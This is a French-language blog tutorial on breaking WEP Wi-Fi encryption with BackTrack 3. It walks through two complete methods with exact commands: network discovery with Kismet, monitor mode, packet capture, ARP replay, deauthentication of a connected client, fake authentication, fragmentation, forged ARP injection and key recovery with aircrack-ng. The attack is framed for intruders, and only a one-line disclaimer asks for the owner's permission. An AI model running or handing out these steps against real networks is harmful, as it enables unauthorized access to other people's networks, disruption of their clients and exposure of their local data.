Les dangers

Outre le fait qu'un intrus puisse utiliser votre connexion à Internet, manger votre quota ou encore faire des vilaines choses depuis votre IP, vous exposez votre réseau personnel à des attaques. En effet, un utilisateur Wi-Fi fait partie du réseau local de votre chez vous, ou de votre entreprise dès qu'il est connecté. Dès lors il peut avoir accès à des données que vous ne pensiez jusqu'alors accessible qu'à votre petite famille, mais mince, votre routeur considère que l'intrus est un membre honnête de la famille ! Un autre article sera consacré à la sécurité de votre réseau.

BackTrack 3, l'outil du hacker

Pour débuter plus facilement, il va vous falloir vous munir de Backtrack. Dans cette article nous utiliserons la version 3, téléchargez-la, et démarrez votre poste depuis le CD ou l'USB bootable que vous aurez obtenu.

Pour ceux qui l'ignorent, BackTrack est une version Live de Linux, basée sur Slax, et comprenant une multitude d'outils d'audit de sécurité en tout genre.

Prérequis

Selon votre matériel il est possible que certaines attaques ne fonctionnent pas. Renseignez-vous quant à la possibilité de pratiquer l'injection avec votre carte Wi-Fi si vous ne parvenez pas à vos fins. Il faut évidemment aussi que vous soyez assez proche de votre cible, voire des clients de votre cible.

Cracker une clé WEP : Première méthode

Cette première méthode considère que votre cible est un routeur auquel au minimum 1 client est connecté. Et de préférence un client "actif".

Repérer une cible

Utilisons Kismet pour obtenir des informations sur les réseaux environnants. Vous le trouverez en parcourant le menu BackTrack.

Utilisez la touche S pour classer les réseaux affichés par F (First Time Seen), ensuite utilisez les touche haut et bas et Entrée pour avoir plus d'informations. Comme le SSID, le BSSID, le Channel, et d'autres.

Utilisez la touche Q pour revenir à l'écran précédent, et Shift + Q pour quitter l'application.

L'important est d'observer la colonne Packts. Cette colonne comptabilise le nombre de paquets que Kismet a récupéré furtivement, plus le nombre est important, plus votre cible est active.

La colonne W indique la sécurité employée par le routeur :

  • N pour aucune, ce réseau est libre,
  • Y pour un chiffrement WEP ce qui nous intéresse,
  • O pour un chiffrement WPA ce qui ne nous intéresse pas.

crack-wep-1-kismet2.jpg

Prenez note de :

  • SSID, il s'agit du nom de la cible,
  • BSSID, il s'agit de l'adresse Mac de la cible,
  • Channel, le canal de votre cible.

Voici les paramètres que nous pouvons récupérer :

  • SSID cible : CrackMoi
  • BSSID cible : 00:12:BF:11:22:33
  • Channel cible : 6

crack-wep-1-kismet.jpg

Passer en mode Monitor

Ceci est une nécessité, commencez par identifier votre interface réseau :

$ iwconfig

Votre interface pourrait être raX, rausbX, athX, wifiX ou encore wlanX, où X est un chiffre. Il est possible que votre interface affiche un autre nom, à vous de voir !

crack-wep-1-iwconfig.jpg

Démarrez votre carte en mode Monitor avec la commande suivante :

# airmon-ng start wifi0 6

Nous sommes obligés de spécifier un canal d'écoute (ici 6) pour ce mode, j'ai remarqué que parfois cela pouvait poser des soucis si vous décidiez de passer à une autre cible sur un autre canal par la suite. N'hésitez pas à redémarrer BackTrack en cas de doute.

La commande devrait vous retourner une information contenant peut-être d'autres noms d'interface. Prenez soin de vérifier que l'interface est bien devenue Monitor Mode Enabled.

crack-wep-1-airmon.jpg

Capturer les paquets Wi-Fi

Nous allons commencer à écouter notre cible et capturer les paquets qui circulent. Dans cette première méthode notre cible sera connectée à un client.

# airodump-ng -a --bssid 00:12:BF:11:22:33 --channel 6 -w crackmoi wifi0

Les paquets seront capturés sous le nom de fichier crackmoi*.cap.

Nous repérons un client connecté sous la colonne Station.

  • Mac Address du client : 00:22:43:11:22:33

crack-wep-1-airodump2.jpg

Piéger le client et le routeur

Nous allons maintenant duper le client et la cible afin de nous immiscer entre eux.

# aireplay-ng --arpreplay -b 00:12:BF:11:22:33 -h 00:22:43:11:22:33 wifi0

crack-wep-1-aireplay-arp.jpg

Ensuite, dans un autre terminal, lancez la commande suivante :

# aireplay-ng --deauth 10 -a 00:12:BF:11:22:33 -c 00:22:43:11:22:33 wifi0

crack-wep-1-aireplay-deauth.jpg

Il est possible que ça ne fonctionne pas du premier coup pour diverses raisons, si cela ne fonctionne pas, réessayez la méthode deauth, si ça ne fonctionne toujours pas, réessayez avec un autre client, et si ça ne fonctionne toujours pas changez de cible.

Pour voir si ça fonctionne observez votre première fenêtre avec Airodump-ng, le nombre de #Data devrait augmenter. Selon les cas cela prend plus ou moins de temps, il faut compter en général 100 000 #Data pour pouvoir déchiffrer la clé.

crack-wep-1-airodump.jpg

Déchiffrer la clé WEP

Une fois que vos avez récupéré assez de paquets, tapez la commande suivant pour lancer l'analyse des données récupérées en vue de cracker la clé WEP :

# aircrack-ng -b 00:12:BF:11:22:33 crackmoi*.cap

crack-wep-1-aircrack.jpg

Et voilà ! Dans notre exemple il s'agit d'une petit clé. Ces dernières nécessitent moins de paquets que les clés habituelles plus longues.

Cracker une clé WEP : Deuxième méthode

Cette méthode ne nécessite pas que des clients soient connectés, mais nécessite une carte réseau supportant l'injection ce qui n'est pas toujours le cas.

Je ne rentrerai plus dans les détails de ce que j'ai déjà expliqué plus haut, reportez-vous ci-dessus si certaines choses ne vous semblent pas claires.

Identifions la cible

  • ESSID cible : CrackMoi
  • BSSID cible : 00:12:BF:11:22:33
  • Channel cible : 6

Connaitre son adresse Mac

Vous devez avoir connaissance de votre Mac Address, pour se faire, tapez :

$ macchanger -s wifi0
  • Votre Mac Address : 00:1C:BF:11:22:33
  • Votre interface : wifi0

crack-wep-1-macchanger.jpg

Il est possible de modifier sa propre Mac Address grâce à l'outil MacChanger, mais cela n'est pas toujours recommandé.

  • Votre Mac Address : 00:1C:BF:11:22:33
  • Votre interface : wifi0

Activer le mode Monitor

# airmon-ng start wifi0 6

S'identifier à la cible

Cette étape est primordiale, il faut vous identifier à la cible. Si cette dernière refuse la connexion alors il vaudra mieux attendre qu'un client se connecte et utiliser la première méthode.

# aireplay-ng --fakeauth 0 -e CrackMoi -a 00:12:BF:11:22:33 -h 00:1C:BF:11:22:33 wifi0

Vous devriez obtenir ceci :

crack-wep-2-aireplay-fakeauth.jpg

Inutile de passer cette étape si vous n'avez pas été authentifié.

Obtenir le PRGA

Il vous faut maintenant trouver le PRGA.

# aireplay-ng --fragment -b 00:12:BF:11:22:33 -h 00:1C:BF:11:22:33 wifi0

crack-wep-2-aireplay-fragment.jpg

Nous obtenons le fichier fragment-0101-204015.xor.

Générer un paquet ARP

Packetforge-ng va nous y aider grâce au fichier fragment-0101-204015.xor que nous venons d'obtenir.

# packetforge-ng --arp -a 00:12:BF:11:22:33 -h 00:1C:BF:11:22:33 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0101-204015.xor -w arppaquet

Le paquet ARP obtenu sera stoqué sous le nom arppaquet.

crack-wep-2-packetforge.jpg

Injecter le paquet ARP

Nous allons maintenant générer des paquets afin de pouvoir en capturer un plus grand nombre beaucoup plus rapidement.

# aireplay-ng --interactive -r arppaquet wifi0

Confirmer l'utilisation de ce paquet en tapant Y.

crack-wep-2-aireplay-interactive.jpg

Capturer les paquets

# airodump-ng --bssid 00:12:BF:11:22:33 --channel 6 -w crackmoi wifi0

crack-wep-2-airodump.jpg

Décrypter la clé WEP

# aircrack-ng -b 00:12:BF:11:22:33 crackmoi*.cap

Et c'est dans la poche !

Conlusion

Le taux de réussite est particulièrement variable, en fonction de plusieurs paramètres (activité des clients, support de l'injection, filtrage des adresses Mac, ...), mais pénétrer un réseau Wi-Fi s'avère anormalement facile par rapport à ce que l'on pourrait croire. Il est temps de passer au système WPA/WPA2. Ah oui, est-ce que je vous ai parlé des failles de ce système...

Liens

Disclaimer

Parce qu'il le faut bien... veillez à obtenir l'autorisation du propriétaire de la station Wi-Fi que vous avez choisi pour cible avant de tenter quoi que ce soit.

Edit : Remis en ligne le 29 avril 2010 sans relecture